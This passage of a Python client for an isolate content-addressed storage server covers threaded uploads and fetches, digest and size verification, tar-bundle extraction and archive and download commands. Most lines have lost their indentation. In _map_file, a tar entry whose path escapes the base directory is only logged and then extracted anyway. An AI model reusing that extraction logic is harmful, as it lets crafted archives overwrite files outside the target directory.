uploaded.append(item)
pending_upload -= 1
logging.debug('Uploaded %d; %d pending: %s (%d)', len(uploaded),
pending_upload, item.digest, item.size)
while not self._aborted and pending_upload:
item = channel.next()
uploaded.append(item)
pending_upload -= 1
logging.debug(
'Uploaded %d; %d pending: %s (%d)',
len(uploaded), pending_upload, item.digest, item.size)
except Exception:
exc_channel.send_exception()
threads = [
threading.Thread(target=_create_items_batches_thread),
threading.Thread(target=_do_lookups_thread),
threading.Thread(target=_handle_missing_thread),
]
for t in threads:
t.start()
try:
# For each digest keep only first isolate_storage.Item that matches it.
# All other items are just indistinguishable copies from the point of view
# of isolate server (it doesn't care about paths at all, only content and
# digests).
seen = {}
try:
        # TODO(maruel): Reorder the items as a priority queue, with larger items
        # being processed first. That is, before hashing the data.
# This must be done in the primary thread since items can be a
# generator.
for item in items:
if seen.setdefault(item.digest, item) is item:
incoming.put(item)
finally:
incoming.put(None)
finally:
for t in threads:
t.join()
exc_channel.send_done()
for _ in exc_channel:
# If there is no exception, this loop does nothing. Otherwise, it raises
# the first exception put onto |exc_channel|.
pass
logging.info('All %s files are uploaded', len(uploaded))
if seen:
_print_upload_stats(seen.values(), uploaded)
return uploaded
def _async_push(self, channel, item, push_state, verify_push=False):
"""Starts asynchronous push to the server in a parallel thread.
Can be used only after |item| was checked for presence on a server with a
/contains RPC.
Arguments:
channel: TaskChannel that receives back |item| when upload ends.
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
verify_push: verify files are uploaded correctly by fetching from server.
Returns:
None, but |channel| later receives back |item| when upload ends.
"""
# Thread pool task priority.
priority = (
threading_utils.PRIORITY_HIGH if item.high_priority
else threading_utils.PRIORITY_MED)
def _push(content):
"""Pushes an isolate_storage.Item and returns it to |channel|."""
if self._aborted:
raise Aborted()
self._storage_api.push(item, push_state, content)
if verify_push:
try:
self._fetch(
item.digest,
item.size,
# this consumes all elements from given generator.
lambda gen: collections.deque(gen, maxlen=0))
except Exception:
# reset push_state if failed to verify.
push_state.finalized = False
push_state.uploaded = False
raise
return item
# If zipping is not required, just start a push task. Don't pass 'content'
# so that it can create a new generator when it retries on failures.
if not self.server_ref.is_with_compression:
self.net_thread_pool.add_task_with_channel(channel, priority, _push, None)
return
# If zipping is enabled, zip in a separate thread.
def zip_and_push():
      # TODO(vadimsh): Implement streaming uploads. Before it's done, assemble
      # the content right here. It will block until the whole file is zipped.
try:
if self._aborted:
raise Aborted()
stream = zip_compress(item.content(), item.compression_level)
# In Python3, zlib.compress returns a byte object instead of str.
data = six.b('').join(stream)
except Exception as exc:
logging.error('Failed to zip \'%s\': %s', item, exc)
channel.send_exception()
return
      # Pass '[data]' explicitly because the compressed data is not the same as the
# one provided by 'item'. Since '[data]' is a list, it can safely be
# reused during retries.
self.net_thread_pool.add_task_with_channel(
channel, priority, _push, [data])
self.cpu_thread_pool.add_task(priority, zip_and_push)
def push(self, item, push_state):
"""Synchronously pushes a single item to the server.
If you need to push many items at once, consider using 'upload_items' or
'_async_push' with instance of TaskChannel.
Arguments:
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
Returns:
Pushed item (same object as |item|).
"""
channel = threading_utils.TaskChannel()
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT):
self._async_push(channel, item, push_state)
pushed = channel.next()
assert pushed is item
return item
def _fetch(self, digest, size, sink):
try:
# Prepare reading pipeline.
stream = self._storage_api.fetch(digest, size, 0)
if self.server_ref.is_with_compression:
stream = zip_decompress(stream, isolated_format.DISK_FILE_CHUNK)
# Run |stream| through verifier that will assert its size.
verifier = FetchStreamVerifier(stream, self.server_ref.hash_algo, digest,
size)
# Verified stream goes to |sink|.
sink(verifier.run())
except Exception:
logging.exception('Failed to fetch %s', digest)
raise
def async_fetch(self, channel, priority, digest, size, sink):
"""Starts asynchronous fetch from the server in a parallel thread.
Arguments:
channel: TaskChannel that receives back |digest| when download ends.
priority: thread pool task priority for the fetch.
digest: hex digest of an item to download.
size: expected size of the item (after decompression).
sink: function that will be called as sink(generator).
"""
def fetch():
self._fetch(digest, size, sink)
return digest
# Don't bother with zip_thread_pool for decompression. Decompression is
# really fast and most probably IO bound anyway.
self.net_thread_pool.add_task_with_channel(channel, priority, fetch)
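# Hedged usage sketch (not called anywhere in this file) of how a caller can
# drive Storage.upload_items() with FileItem instances. The server URL,
# namespace and file paths are hypothetical placeholders; FileItem,
# get_storage() and isolate_storage.ServerRef are helpers this module
# already uses.
def _example_upload_files(server_url, namespace, paths):
  """Minimal sketch, assuming |paths| is a list of existing local files."""
  server_ref = isolate_storage.ServerRef(server_url, namespace)
  with get_storage(server_ref) as storage:
    items = [
        FileItem(path=p, algo=server_ref.hash_algo, high_priority=False)
        for p in paths
    ]
    # upload_items() pushes only the items the server reports as missing.
    uploaded = storage.upload_items(items)
  return {i.digest for i in uploaded}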
class FetchQueue(object):
"""Fetches items from Storage and places them into ContentAddressedCache.
It manages multiple concurrent fetch operations. Acts as a bridge between
Storage and ContentAddressedCache so that Storage and ContentAddressedCache
don't depend on each other at all.
"""
def __init__(self, storage, cache):
self.storage = storage
self.cache = cache
self._channel = threading_utils.TaskChannel()
self._pending = set()
self._accessed = set()
self._fetched = set(cache)
# Pending digests that the caller waits for, see wait_on()/wait().
self._waiting_on = set()
# Already fetched digests the caller waits for which are not yet returned by
# wait().
self._waiting_on_ready = set()
def add(
self,
digest,
size=local_caching.UNKNOWN_FILE_SIZE,
priority=threading_utils.PRIORITY_MED):
"""Starts asynchronous fetch of item |digest|."""
# Fetching it now?
if digest in self._pending:
return
# Mark this file as in use, verify_all_cached will later ensure it is still
# in cache.
self._accessed.add(digest)
# Already fetched? Notify cache to update item's LRU position.
if digest in self._fetched:
# 'touch' returns True if item is in cache and not corrupted.
if self.cache.touch(digest, size):
return
logging.error('%s is corrupted', digest)
self._fetched.remove(digest)
# TODO(maruel): It should look at the free disk space, the current cache
# size and the size of the new item on every new item:
# - Trim the cache as more entries are listed when free disk space is low,
# otherwise if the amount of data downloaded during the run > free disk
# space, it'll crash.
# - Make sure there's enough free disk space to fit all dependencies of
# this run! If not, abort early.
# Start fetching.
self._pending.add(digest)
self.storage.async_fetch(
self._channel, priority, digest, size,
functools.partial(self.cache.write, digest))
def wait_on(self, digest):
"""Updates digests to be waited on by 'wait'."""
# Calculate once the already fetched items. These will be retrieved first.
if digest in self._fetched:
self._waiting_on_ready.add(digest)
else:
self._waiting_on.add(digest)
def wait(self):
"""Waits until any of waited-on items is retrieved.
    Once this happens, it is removed from the waited-on set and returned.
    This function is called in two waves: the first wave handles the HIGH
    priority items (the isolated files themselves); the second wave handles
    all the files.
If the waited-on set is empty, raises RuntimeError.
"""
# Flush any already fetched items.
if self._waiting_on_ready:
return self._waiting_on_ready.pop()
assert self._waiting_on, 'Needs items to wait on'
# Wait for one waited-on item to be fetched.
while self._pending:
digest = self._channel.next()
self._pending.remove(digest)
self._fetched.add(digest)
if digest in self._waiting_on:
self._waiting_on.remove(digest)
return digest
# Should never reach this point due to assert above.
raise RuntimeError('Impossible state')
@property
def wait_queue_empty(self):
"""Returns True if there is no digest left for wait() to return."""
return not self._waiting_on and not self._waiting_on_ready
def inject_local_file(self, path, algo):
"""Adds local file to the cache as if it was fetched from storage."""
with fs.open(path, 'rb') as f:
data = f.read()
digest = algo(data).hexdigest()
self.cache.write(digest, [data])
self._fetched.add(digest)
return digest
@property
def pending_count(self):
"""Returns number of items to be fetched."""
return len(self._pending)
def verify_all_cached(self):
"""True if all accessed items are in cache."""
# Not thread safe, but called after all work is done.
return self._accessed.issubset(self.cache)
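# Hedged sketch (not called anywhere) of the FetchQueue add()/wait_on()/wait()
# pattern that fetch_isolated() uses further below. 'storage', 'cache' and
# digest_to_size are hypothetical placeholders.
def _example_fetch_queue_loop(storage, cache, digest_to_size):
  """Minimal sketch, assuming digest_to_size maps hex digests to sizes."""
  fetch_queue = FetchQueue(storage, cache)
  for digest, size in digest_to_size.items():
    fetch_queue.add(digest, size, threading_utils.PRIORITY_MED)
    fetch_queue.wait_on(digest)
  fetched = []
  while not fetch_queue.wait_queue_empty:
    # wait() returns one waited-on digest as soon as its data is in the cache.
    fetched.append(fetch_queue.wait())
  return fetched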
class FetchStreamVerifier(object):
"""Verifies that fetched file is valid before passing it to the
ContentAddressedCache.
"""
def __init__(self, stream, hasher, expected_digest, expected_size):
"""Initializes the verifier.
Arguments:
* stream: an iterable yielding chunks of content
* hasher: an object from hashlib that supports update() and hexdigest()
(eg, hashlib.sha1).
* expected_digest: if the entire stream is piped through hasher and then
summarized via hexdigest(), this should be the result. That is, it
should be a hex string like 'abc123'.
* expected_size: either the expected size of the stream, or
local_caching.UNKNOWN_FILE_SIZE.
"""
assert stream is not None
self.stream = stream
self.expected_digest = expected_digest
self.expected_size = expected_size
self.current_size = 0
self.rolling_hash = hasher()
def run(self):
"""Generator that yields same items as |stream|.
Verifies |stream| is complete before yielding a last chunk to consumer.
Also wraps IOError produced by consumer into MappingError exceptions since
otherwise Storage will retry fetch on unrelated local cache errors.
"""
# Read one chunk ahead, keep it in |stored|.
# That way a complete stream can be verified before pushing last chunk
# to consumer.
stored = None
for chunk in self.stream:
assert chunk is not None
if stored is not None:
self._inspect_chunk(stored, is_last=False)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
stored = chunk
if stored is not None:
self._inspect_chunk(stored, is_last=True)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
def _inspect_chunk(self, chunk, is_last):
"""Called for each fetched chunk before passing it to consumer."""
self.current_size += len(chunk)
self.rolling_hash.update(chunk)
if not is_last:
return
if ((self.expected_size != local_caching.UNKNOWN_FILE_SIZE) and
(self.expected_size != self.current_size)):
msg = 'Incorrect file size: want %d, got %d' % (
self.expected_size, self.current_size)
raise IOError(msg)
actual_digest = self.rolling_hash.hexdigest()
if self.expected_digest != actual_digest:
msg = 'Incorrect digest: want %s, got %s' % (
self.expected_digest, actual_digest)
raise IOError(msg)
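# Hedged, self-contained sketch (not called anywhere) of what
# FetchStreamVerifier does: it re-hashes and size-checks a chunk stream and
# only then hands the last chunk to the consumer. hashlib.sha1 stands in for
# the namespace hash; real callers pass storage.server_ref.hash_algo.
def _example_verify_chunks(chunks):
  """Minimal sketch, assuming |chunks| is a list of bytes objects."""
  import hashlib
  data = b''.join(chunks)
  expected_digest = hashlib.sha1(data).hexdigest()
  verifier = FetchStreamVerifier(
      iter(chunks), hashlib.sha1, expected_digest, len(data))
  # run() yields the same chunks, raising IOError on size or digest mismatch.
  return b''.join(verifier.run())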
class IsolatedBundle(object):
"""Fetched and parsed .isolated file with all dependencies."""
def __init__(self, filter_cb):
"""
filter_cb: callback function to filter downloaded content.
When filter_cb is not None, Isolated file is downloaded iff
filter_cb(filepath) returns True.
"""
self.command = []
self.files = {}
self.relative_cwd = None
# The main .isolated file, a IsolatedFile instance.
self.root = None
self._filter_cb = filter_cb
def fetch(self, fetch_queue, root_isolated_hash, algo):
"""Fetches the .isolated and all the included .isolated.
It enables support for "included" .isolated files. They are processed in
strict order but fetched asynchronously from the cache. This is important so
that a file in an included .isolated file that is overridden by an embedding
    .isolated file is not fetched needlessly. The includes are fetched in one
    pass and the files are fetched as soon as all the ones on the left side
    of the tree have been fetched.
The prioritization is very important here for nested .isolated files.
'includes' have the highest priority and the algorithm is optimized for both
deep and wide trees. A deep one is a long link of .isolated files referenced
one at a time by one item in 'includes'. A wide one has a large number of
'includes' in a single .isolated file. 'left' is defined as an included
.isolated file earlier in the 'includes' list. So the order of the elements
in 'includes' is important.
As a side effect this method starts asynchronous fetch of all data files
by adding them to |fetch_queue|. It doesn't wait for data files to finish
fetching though.
"""
self.root = isolated_format.IsolatedFile(root_isolated_hash, algo)
# Isolated files being retrieved now: hash -> IsolatedFile instance.
pending = {}
# Set of hashes of already retrieved items to refuse recursive includes.
seen = set()
    # Set of IsolatedFile's whose data files have already been fetched.
processed = set()
def retrieve_async(isolated_file):
"""Retrieves an isolated file included by the root bundle."""
h = isolated_file.obj_hash
if h in seen:
raise isolated_format.IsolatedError(
'IsolatedFile %s is retrieved recursively' % h)
assert h not in pending
seen.add(h)
pending[h] = isolated_file
# This isolated item is being added dynamically, notify FetchQueue.
fetch_queue.wait_on(h)
fetch_queue.add(h, priority=threading_utils.PRIORITY_HIGH)
# Start fetching root *.isolated file (single file, not the whole bundle).
retrieve_async(self.root)
while pending:
# Wait until some *.isolated file is fetched, parse it.
item_hash = fetch_queue.wait()
item = pending.pop(item_hash)
with fetch_queue.cache.getfileobj(item_hash) as f:
item.load(f.read())
# Start fetching included *.isolated files.
for new_child in item.children:
retrieve_async(new_child)
# Always fetch *.isolated files in traversal order, waiting if necessary
# until next to-be-processed node loads. "Waiting" is done by yielding
# back to the outer loop, that waits until some *.isolated is loaded.
for node in isolated_format.walk_includes(self.root):
if node not in processed:
# Not visited, and not yet loaded -> wait for it to load.
if not node.is_loaded:
break
# Not visited and loaded -> process it and continue the traversal.
self._start_fetching_files(node, fetch_queue)
processed.add(node)
# All *.isolated files should be processed by now and only them.
all_isolateds = set(isolated_format.walk_includes(self.root))
assert all_isolateds == processed, (all_isolateds, processed)
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
# Extract 'command' and other bundle properties.
for node in isolated_format.walk_includes(self.root):
self._update_self(node)
self.relative_cwd = self.relative_cwd or ''
def _start_fetching_files(self, isolated, fetch_queue):
"""Starts fetching files from |isolated| that are not yet being fetched.
Modifies self.files.
"""
files = isolated.data.get('files', {})
logging.debug('fetch_files(%s, %d)', isolated.obj_hash, len(files))
for filepath, properties in files.items():
if self._filter_cb and not self._filter_cb(filepath):
continue
# Root isolated has priority on the files being mapped. In particular,
# overridden files must not be fetched.
if filepath not in self.files:
self.files[filepath] = properties
# Preemptively request hashed files.
if 'h' in properties:
fetch_queue.add(
properties['h'], properties['s'], threading_utils.PRIORITY_MED)
def _update_self(self, node):
"""Extracts bundle global parameters from loaded *.isolated file.
Will be called with each loaded *.isolated file in order of traversal of
isolated include graph (see isolated_format.walk_includes).
"""
# Grabs properties.
if not self.command and node.data.get('command'):
# Ensure paths are correctly separated on windows.
self.command = node.data['command']
if self.command:
self.command[0] = self.command[0].replace('/', os.path.sep)
if (self.relative_cwd is None and
node.data.get('relative_cwd') is not None):
self.relative_cwd = node.data['relative_cwd']
def get_storage(server_ref):
"""Returns Storage class that can upload and download from |namespace|.
Arguments:
server_ref: isolate_storage.ServerRef instance.
Returns:
Instance of Storage.
"""
# Handle the specific internal use case.
assert (isinstance(server_ref, isolate_storage.ServerRef) or
type(server_ref).__name__ == 'ServerRef'), repr(server_ref)
return Storage(isolate_storage.get_storage_api(server_ref))
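# Hedged sketch (not called anywhere) of the async_fetch()/TaskChannel pattern
# that CMDdownload uses below for individual files. The digests and
# destination paths in digest_to_path are hypothetical placeholders.
def _example_async_fetch(storage, digest_to_path):
  """Minimal sketch, assuming digest_to_path maps hex digests to dest paths."""
  channel = threading_utils.TaskChannel()
  pending = dict(digest_to_path)
  for digest, dest in pending.items():
    storage.async_fetch(
        channel, threading_utils.PRIORITY_MED, digest,
        local_caching.UNKNOWN_FILE_SIZE,
        functools.partial(local_caching.file_write, dest))
  while pending:
    # Each next() call returns one digest whose file has been written.
    pending.pop(channel.next())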
def _map_file(dst, digest, props, cache, use_symlinks):
"""Put downloaded file to destination path. This function is used for multi
threaded file putting.
"""
with tools.Profiler("_map_file for %s" % dst):
with cache.getfileobj(digest) as srcfileobj:
filetype = props.get('t', 'basic')
if filetype == 'basic':
# Ignore all bits apart from the user.
file_mode = (props.get('m') or 0o500) & 0o700
putfile(srcfileobj, dst, file_mode, use_symlink=use_symlinks)
elif filetype == 'tar':
basedir = os.path.dirname(dst)
with tarfile.TarFile(fileobj=srcfileobj, encoding='utf-8') as t:
ensured_dirs = set()
for ti in t:
if not ti.isfile():
logging.warning('Path(%r) is nonfile (%s), skipped', ti.name,
ti.type)
continue
# Handle files created on Windows fetched on POSIX and the
# reverse.
other_sep = '/' if os.path.sep == '\\' else '\\'
name = ti.name.replace(other_sep, os.path.sep)
fp = os.path.normpath(os.path.join(basedir, name))
if not fp.startswith(basedir):
logging.error('Path(%r) is outside root directory', fp)
ifd = t.extractfile(ti)
fp_dir = os.path.dirname(fp)
if fp_dir not in ensured_dirs:
file_path.ensure_tree(fp_dir)
ensured_dirs.add(fp_dir)
file_mode = ti.mode & 0o700
putfile(ifd, fp, file_mode, ti.size)
else:
raise isolated_format.IsolatedError('Unknown file type %r' % filetype)
def fetch_isolated(isolated_hash, storage, cache, outdir, use_symlinks,
filter_cb=None):
"""Aggressively downloads the .isolated file(s), then download all the files.
Arguments:
isolated_hash: hash of the root *.isolated file.
storage: Storage class that communicates with isolate storage.
cache: ContentAddressedCache class that knows how to store and map files
locally.
outdir: Output directory to map file tree to.
use_symlinks: Use symlinks instead of hardlinks when True.
filter_cb: filter that works as allowlist for downloaded files.
Returns:
IsolatedBundle object that holds details about loaded *.isolated file.
"""
logging.debug(
'fetch_isolated(%s, %s, %s, %s, %s)',
isolated_hash, storage, cache, outdir, use_symlinks)
# Hash algorithm to use, defined by namespace |storage| is using.
algo = storage.server_ref.hash_algo
fetch_queue = FetchQueue(storage, cache)
bundle = IsolatedBundle(filter_cb)
with tools.Profiler('GetIsolateds'):
# Optionally support local files by manually adding them to cache.
if not isolated_format.is_valid_hash(isolated_hash, algo):
logging.debug(
'%s is not a valid hash, assuming a file '
'(algo was %s, hash size was %d)', isolated_hash, algo(),
algo().digest_size)
path = six.text_type(os.path.abspath(isolated_hash))
try:
isolated_hash = fetch_queue.inject_local_file(path, algo)
except IOError as e:
raise isolated_format.MappingError(
            '%s doesn\'t seem to be a valid file. Did you intend to pass a '
'valid hash (error: %s)?' % (isolated_hash, e))
# Load all *.isolated and start loading rest of the files.
bundle.fetch(fetch_queue, isolated_hash, algo)
with tools.Profiler('GetRest'):
# Create file system hierarchy.
file_path.ensure_tree(outdir)
create_directories(outdir, bundle.files)
_create_symlinks(outdir, bundle.files.items())
# Ensure working directory exists.
cwd = os.path.normpath(os.path.join(outdir, bundle.relative_cwd))
file_path.ensure_tree(cwd)
# Multimap: digest -> list of pairs (path, props).
remaining = {}
for filepath, props in bundle.files.items():
if 'h' in props:
remaining.setdefault(props['h'], []).append((filepath, props))
fetch_queue.wait_on(props['h'])
# Now block on the remaining files to be downloaded and mapped.
logging.info('Retrieving remaining files (%d of them)...',
fetch_queue.pending_count)
last_update = time.time()
with threading_utils.ThreadPool(2, 32, 32) as putfile_thread_pool:
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
while remaining:
detector.ping()
# Wait for any item to finish fetching to cache.
digest = fetch_queue.wait()
# Create the files in the destination using item in cache as the
# source.
for filepath, props in remaining.pop(digest):
fullpath = os.path.join(outdir, filepath)
putfile_thread_pool.add_task(threading_utils.PRIORITY_HIGH,
_map_file, fullpath, digest, props,
cache, use_symlinks)
# Report progress.
duration = time.time() - last_update
if duration > DELAY_BETWEEN_UPDATES_IN_SECS:
msg = '%d files remaining...' % len(remaining)
sys.stdout.write(msg + '\n')
sys.stdout.flush()
logging.info(msg)
last_update = time.time()
assert fetch_queue.wait_queue_empty, 'FetchQueue should have been emptied'
putfile_thread_pool.join()
  # Save the cache right away so as not to lose the state of the new objects.
cache.save()
# Cache could evict some items we just tried to fetch, it's a fatal error.
if not fetch_queue.verify_all_cached():
free_disk = file_path.get_free_space(cache.cache_dir)
msg = (
'Cache is too small to hold all requested files.\n'
' %s\n cache=%dbytes, %d items; %sb free_space') % (
cache.policies, cache.total_size, len(cache), free_disk)
raise isolated_format.MappingError(msg)
return bundle
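# Hedged sketch (not called anywhere) of a typical fetch_isolated() call,
# mirroring what CMDdownload does below. server_url, namespace, isolated_hash
# and outdir are hypothetical placeholders; a DiskContentAddressedCache works
# here as well.
def _example_fetch_isolated(server_url, namespace, isolated_hash, outdir):
  """Minimal sketch using an in-memory content addressed cache."""
  server_ref = isolate_storage.ServerRef(server_url, namespace)
  cache = local_caching.MemoryContentAddressedCache()
  with get_storage(server_ref) as storage:
    bundle = fetch_isolated(
        isolated_hash=isolated_hash,
        storage=storage,
        cache=cache,
        outdir=outdir,
        use_symlinks=False)
  return bundle.command, bundle.relative_cwd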
def _directory_to_metadata(root, algo, denylist):
"""Yields every file and/or symlink found.
Yields:
tuple(FileItem, relpath, metadata)
For a symlink, FileItem is None.
"""
# Current tar file bundle, if any.
root = file_path.get_native_path_case(root)
bundle = TarBundle(root, algo)
for relpath, issymlink in isolated_format.expand_directory_and_symlink(
root,
u'.' + os.path.sep,
denylist,
follow_symlinks=(sys.platform != 'win32')):
filepath = os.path.join(root, relpath)
if issymlink:
# TODO(maruel): Do not call this.
meta = isolated_format.file_to_metadata(filepath, False)
yield None, relpath, meta
continue
prio = relpath.endswith('.isolated')
if bundle.try_add(FileItem(path=filepath, algo=algo, high_priority=prio)):
# The file was added to the current pending tarball and won't be archived
# individually.
continue
# Flush and reset the bundle.
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
bundle = TarBundle(root, algo)
# Yield the file individually.
item = FileItem(path=filepath, algo=algo, size=None, high_priority=prio)
yield item, relpath, item.meta
for i, p, m in bundle.yield_item_path_meta():
yield i, p, m
def _print_upload_stats(items, missing):
"""Prints upload stats."""
total = len(items)
total_size = sum(f.size for f in items)
logging.info(
'Total: %6d, %9.1fkiB', total, total_size / 1024.)
cache_hit = set(items).difference(missing)
cache_hit_size = sum(f.size for f in cache_hit)
logging.info(
'cache hit: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_hit),
cache_hit_size / 1024.,
len(cache_hit) * 100. / total,
cache_hit_size * 100. / total_size if total_size else 0)
cache_miss = missing
cache_miss_size = sum(f.size for f in cache_miss)
logging.info('cache miss: %6d, %9.1fkiB, %6.2f%% files, %6.2f%% size',
len(cache_miss), cache_miss_size / 1024.,
len(cache_miss) * 100. / total,
cache_miss_size * 100. / total_size if total_size else 0)
def _enqueue_dir(dirpath, denylist, hash_algo, hash_algo_name):
"""Called by archive_files_to_storage for a directory.
Create an .isolated file.
Yields:
FileItem for every file found, plus one for the .isolated file itself.
"""
files = {}
for item, relpath, meta in _directory_to_metadata(dirpath, hash_algo,
denylist):
# item is None for a symlink.
files[relpath] = meta
if item:
yield item
  # TODO(maruel): If there is no file, don't yield an .isolated file.
data = {
'algo': hash_algo_name,
'files': files,
'version': isolated_format.ISOLATED_FILE_VERSION,
}
# Keep the file in memory. This is fine because .isolated files are relatively
# small.
yield BufferItem(
tools.format_json(data, True).encode(),
algo=hash_algo,
high_priority=True)
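# Hedged illustration of the in-memory .isolated document that _enqueue_dir()
# serializes into its final BufferItem. The file entry, hash and size are
# hypothetical; 'h' is the content hash, 's' the size and 'm' the mode, as
# consumed by _start_fetching_files() and _map_file() above.
_EXAMPLE_ISOLATED_DOC = {
    'algo': 'sha-1',
    'files': {
        'src/main.py': {'h': 'deadbeef' * 5, 's': 1234, 'm': 0o500},
    },
    'version': isolated_format.ISOLATED_FILE_VERSION,
}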
def _archive_files_to_storage_internal(storage,
files,
denylist,
verify_push=False):
"""Stores every entry into remote storage and returns stats.
Arguments:
storage: a Storage object that communicates with the remote object store.
files: iterable of files to upload. If a directory is specified (with a
trailing slash), a .isolated file is created and its hash is returned.
Duplicates are skipped.
denylist: function that returns True if a file should be omitted.
verify_push: verify files are uploaded correctly by fetching from server.
Returns:
tuple(OrderedDict(path: hash), list(FileItem cold), list(FileItem hot)).
The first file in the first item is always the .isolated file.
Raises:
Re-raises the exception in upload_items(), if there is any.
"""
# Dict of path to hash.
results = collections.OrderedDict()
hash_algo = storage.server_ref.hash_algo
hash_algo_name = storage.server_ref.hash_algo_name
# Generator of FileItem to pass to upload_items() concurrent operation.
channel = threading_utils.TaskChannel()
exc_channel = threading_utils.TaskChannel()
uploaded_digests = set()
def _upload_items():
try:
results = storage.upload_items(channel, verify_push)
uploaded_digests.update(f.digest for f in results)
except Exception:
exc_channel.send_exception()
t = threading.Thread(target=_upload_items)
t.start()
# Keep track locally of the items to determine cold and hot items.
items_found = []
try:
for f in files:
assert isinstance(f, six.text_type), repr(f)
if f in results:
# Duplicate
continue
try:
filepath = os.path.abspath(f)
if fs.isdir(filepath):
# Uploading a whole directory.
item = None
for item in _enqueue_dir(filepath, denylist, hash_algo,
hash_algo_name):
channel.send_result(item)
items_found.append(item)
# The very last item will be the .isolated file.
if not item:
# There was no file in the directory.
continue
elif fs.isfile(filepath):
item = FileItem(
path=filepath,
algo=hash_algo,
size=None,
high_priority=f.endswith('.isolated'))
channel.send_result(item)
items_found.append(item)
else:
          raise Error('%s is neither a file nor a directory.' % f)
results[f] = item.digest
except OSError:
raise Error('Failed to process %s.' % f)
finally:
# Stops the generator, so _upload_items() can exit.
channel.send_done()
t.join()
exc_channel.send_done()
try:
for _ in exc_channel:
pass
except Exception:
# log items when failed to upload files.
for item in items_found:
if isinstance(item, FileItem):
logging.error('FileItem path: %s, digest:%s, re-calculated digest:%s',
item.path, item.digest,
isolated_format.hash_file(item.path, item.algo))
continue
logging.error('Item digest:%s', item.digest)
raise
cold = []
hot = []
for i in items_found:
# Note that multiple FileItem may have the same .digest.
if i.digest in uploaded_digests:
cold.append(i)
else:
hot.append(i)
return results, cold, hot
# TODO(crbug.com/1073832):
# remove this if process leak in coverage build was fixed.
def archive_files_to_storage(storage, files, denylist, verify_push=False):
"""Calls _archive_files_to_storage_internal with retry.
Arguments:
See Arguments section in _archive_files_to_storage_internal
Returns:
See Returns section in _archive_files_to_storage_internal
Raises:
Re-raises the exception in _archive_files_to_storage_internal if all retry
failed.
"""
# Will do exponential backoff.
# e.g. 10, 20, 40, 80
backoff = 10
while True:
try:
return _archive_files_to_storage_internal(storage, files, denylist,
verify_push)
except Exception:
if backoff > 100:
raise
on_error.report('error before %d second backoff' % backoff)
logging.exception(
'failed to run _archive_files_to_storage_internal,'
' will retry after %d seconds', backoff)
time.sleep(backoff)
backoff *= 2
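# Hedged sketch (not called anywhere) of calling archive_files_to_storage()
# directly, mirroring CMDarchive below. server_url, namespace and paths are
# hypothetical placeholders; the denylist here rejects nothing.
def _example_archive(server_url, namespace, paths):
  """Minimal sketch; returns a dict mapping each input path to its hash."""
  server_ref = isolate_storage.ServerRef(server_url, namespace)
  with get_storage(server_ref) as storage:
    results, _cold, _hot = archive_files_to_storage(
        storage, [six.ensure_text(p) for p in paths], lambda _path: False)
  return dict(results)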
@subcommand.usage('<file1..fileN> or - to read from stdin')
def CMDarchive(parser, args):
"""Archives data to the server.
  If a directory is specified, a .isolated file is created and the whole
  directory is uploaded. This .isolated file can then be included in another
  one to run commands.
  The command outputs each file that was processed with its content hash. For
directories, the .isolated generated for the directory is listed as the
directory entry itself.
"""
add_isolate_server_options(parser)
add_archive_options(parser)
options, files = parser.parse_args(args)
process_isolate_server_options(parser, options, True)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
if files == ['-']:
files = (l.rstrip('\n\r') for l in sys.stdin)
if not files:
parser.error('Nothing to upload')
files = (six.ensure_text(f) for f in files)
denylist = tools.gen_denylist(options.blacklist)
try:
with get_storage(server_ref) as storage:
results, _cold, _hot = archive_files_to_storage(storage, files, denylist)
except (Error, local_caching.NoMoreSpace) as e:
parser.error(e.args[0])
print('\n'.join('%s %s' % (h, f) for f, h in results.items()))
return 0
def CMDdownload(parser, args):
"""Download data from the server.
It can either download individual files or a complete tree from a .isolated
file.
"""
add_isolate_server_options(parser)
parser.add_option(
'-s', '--isolated', metavar='HASH',
help='hash of an isolated file, .isolated file content is discarded, use '
'--file if you need it')
parser.add_option(
'-f',
'--file',
metavar='HASH DEST',
default=[],
action='append',
nargs=2,
help='hash and destination of a file, can be used multiple times')
parser.add_option(
'-t',
'--target',
metavar='DIR',
default='download',
help='destination directory')
parser.add_option(
'--use-symlinks',
action='store_true',
help='Use symlinks instead of hardlinks')
add_cache_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported arguments: %s' % args)
if not file_path.enable_symlink():
logging.warning('Symlink support is not enabled')
process_isolate_server_options(parser, options, True)
if bool(options.isolated) == bool(options.file):
parser.error('Use one of --isolated or --file, and only one.')
if not options.cache and options.use_symlinks:
    parser.error('--use-symlinks requires the use of a cache with --cache')
cache = process_cache_options(options, trim=True)
cache.cleanup()
options.target = six.text_type(os.path.abspath(options.target))
if options.isolated:
if (fs.isfile(options.target) or
(fs.isdir(options.target) and fs.listdir(options.target))):
parser.error(
'--target \'%s\' exists, please use another target' % options.target)
server_ref = isolate_storage.ServerRef(
options.isolate_server, options.namespace)
with get_storage(server_ref) as storage:
# Fetching individual files.
if options.file:
# TODO(maruel): Enable cache in this case too.
channel = threading_utils.TaskChannel()
pending = {}
for digest, dest in options.file:
dest = six.text_type(dest)
pending[digest] = dest
storage.async_fetch(
channel, threading_utils.PRIORITY_MED, digest,
local_caching.UNKNOWN_FILE_SIZE,
functools.partial(local_caching.file_write,
os.path.join(options.target, dest)))
while pending:
fetched = channel.next()
dest = pending.pop(fetched)
logging.info('%s: %s', fetched, dest)
# Fetching whole isolated tree.
if options.isolated:
bundle = fetch_isolated(
isolated_hash=options.isolated,
storage=storage,
cache=cache,
outdir=options.target,
use_symlinks=options.use_symlinks)
cache.trim()
if bundle.command:
rel = os.path.join(options.target, bundle.relative_cwd)
print('To run this test please run from the directory %s:' %
os.path.join(options.target, rel))
print(' ' + ' '.join(bundle.command))
return 0
def add_archive_options(parser):
parser.add_option(
